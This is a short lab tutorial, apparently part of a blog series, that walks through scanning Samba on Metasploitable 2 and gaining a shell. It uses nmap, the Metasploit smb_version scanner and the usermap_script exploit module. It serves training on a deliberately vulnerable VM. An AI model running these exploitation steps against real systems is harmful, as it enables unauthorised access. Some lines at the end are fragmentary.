Metasploitable 2: Ports 139, 445
This is part V of the Metasploitable 2 series. In part I the lab was prepared, in part II we tested port 21, in part III we tested port 25, in part IV it was port 80. You can follow these articles here.
In this part we’re going to scan SAMBA ports 139 and 445.
SAMBA is the open source implementation of the Windows File Sharing Protocol. Let’s find more information about the service running behind these ports. Let’s do an nmap scan:
> db_nmap -sV -p 139,445 192.168.231.109
And now use a scanner module:
> use auxiliary/scanner/smb/smb_version
> show options
> run
We got Samba version 3.0.20. Now search through SearchSploit:
There is our attack vector. Go back to MSF and search for the module with:
> grep samba search username map script
> use exploit/multi/samba/usermap_script
> show options
> run
Execute and obtain shell:
Conclusion
In this article we scanned for SAMBA, found the version running, determined it was exploitable and obtained a shell.
> search samba
use